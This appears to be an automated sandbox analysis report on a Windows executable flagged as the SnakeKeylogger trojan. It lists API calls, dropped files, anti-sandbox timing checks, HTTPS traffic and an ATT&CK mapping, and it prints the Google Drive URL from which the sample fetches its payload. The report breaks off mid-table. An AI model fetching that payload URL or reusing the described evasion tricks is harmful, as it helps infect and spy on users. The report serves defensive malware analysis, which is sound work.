      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=downloade
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=downloader
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49760 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49859 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49896 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49903 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49932 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49986 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49990 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 8_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe File created: C:\Windows\resources\0809
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_00404B6E
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_0040659D
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 8_2_00404B6E
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 8_2_0040659D
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: String function: 00402B3A appears 51 times
      Source: ME-SPC-94.03.60.175.07.exe, 00000004.00000000.1278167937.000000000044A000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exe Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Code function: 4_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe File created: C:\Users\user\subacidity.lnk
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe File created: C:\Users\user~1\AppData\Local\Temp\nsw4A52.tmp
      Source: ME-SPC-94.03.60.175.07.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: ME-SPC-94.03.60.175.07.exe ReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe File read: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
      Source: unknown Process created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Process created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.4.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match | File source: 00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_004062B2
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_10002DE0 push eax; ret 4_2_10002E0E
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | File created: C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | API/Special instruction interceptor: Address: 98FE1FA
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | API/Special instruction interceptor: Address: 648E1FA
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | RDTSC instruction interceptor: First address: 98C4FAE second address: 98C4FAE instructions: 0x00000000 rdtsc 0x00000002 cmp ax, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F4F44F0F037h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | RDTSC instruction interceptor: First address: 6454FAE second address: 6454FAE instructions: 0x00000000 rdtsc 0x00000002 cmp ax, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F4F44F0A897h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe TID: 6444 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004057D0
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_0040628B FindFirstFileW,FindClose, 4_2_0040628B
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_00402770 FindFirstFileW, 8_2_00402770
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_004057D0
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_0040628B FindFirstFileW,FindClose, 8_2_0040628B
Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | API call chain: ExitProcess graph end node (graph_4-4755)
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | API call chain: ExitProcess graph end node (graph_4-4756)
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW, 4_2_00401752
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_004062B2
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Process created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 4_2_00405F6A
MITRE ATT&CK Matrix, listed per tactic column (a number in parentheses is the count the report shows next to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (1); File and Directory Discovery (3); System Information Discovery (23); Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
ME-SPC-94.03.60.175.07.exe | 55% | ReversingLabs | Win32.Trojan.SnakeKeylogger

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll | 0% | ReversingLabs

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 172.217.19.174 | true | false | | high
drive.usercontent.google.com | 142.250.181.1 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940459246.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967537736.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256232847.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1653182193.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2255968173.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436273091.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099903661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2283011748.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562778198.00000000070F5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://apis.google.com | ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | ME-SPC-94.03.60.175.07.exe | false | | high
https://translate.google.com/translate_a/element.js | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881673139.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063254420.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967537736.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726731024.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754922888.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908618007.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1653182193.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562940233.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 